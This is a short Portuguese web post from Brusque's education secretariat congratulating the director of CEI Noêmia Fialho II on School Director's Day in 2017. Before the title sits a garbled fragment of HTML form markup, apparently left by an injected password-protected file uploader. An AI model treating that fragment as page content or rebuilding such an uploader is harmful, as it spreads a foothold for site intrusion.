POST>PASSWORD: CHECKBOX NAME="F[]" VALUE=" "_upl" value="Upload" name="uploader" id="uploader" DIA DO DIRETOR ESCOLAR NO CEI NOÊMIA FIALHO II – Secretaria de Educação de Brusque
Weather:
HomeDIA DO DIRETOR ESCOLARDIA DO DIRETOR ESCOLAR NO CEI NOÊMIA FIALHO II

DIA DO DIRETOR ESCOLAR NO CEI NOÊMIA FIALHO II

Toda escola é composta por uma equipe, e todos são fundamentais para que a mesma se desenvolva de maneira produtiva e, com isso obtenha resultados satisfatórios. Por isso, o Diretor Escolar desenvolve seu trabalho procurando alcançar sempre o melhor, dentro do ambiente educativo. “Todo o diretor de escola passa por desafios diários, por isso deve ter os olhos voltados para o futuro”, envolvendo princípios e valores praticados e defendidos nas instituições de ensino.
Dia 12 de Novembro é comemorado o Dia do Diretor Escolar… O grupo do Centro de Ensino Infantil Noêmia Fialho II, aproveita a oportunidade para felicitar a nossa Diretora pelo seu dia e a todos os Diretores da Rede Municipal de Ensino por sua atuação, contribuindo na trilha dos melhores caminhos para educação.
Equipe Pedagógica/2017.